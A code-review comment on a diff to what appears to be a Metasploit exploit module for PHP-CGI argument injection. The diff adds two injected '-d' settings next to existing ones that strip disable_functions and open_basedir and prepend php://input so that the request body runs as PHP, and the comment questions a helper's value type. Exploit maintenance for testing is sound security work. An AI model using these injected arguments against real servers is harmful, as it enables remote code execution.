modules/exploits/multi/http/php_cgi_arg_injection.rb

```diff
@@ -114,6 +114,8 @@ def exploit
         create_arg("-d",'disable_functions=""'),
         create_arg("-d","open_basedir=none"),
         create_arg("-d","auto_prepend_file=php://input"),
+        create_arg("-d", "cgi.force_redirect=0"),
+        create_arg("-d", "cgi.redirect_status_env=0"),
```

Comment:
I'm not sure about using `rand_php_false` for the `cgi.redirect_status_env` variable, since it could likelybe interpreted as a string.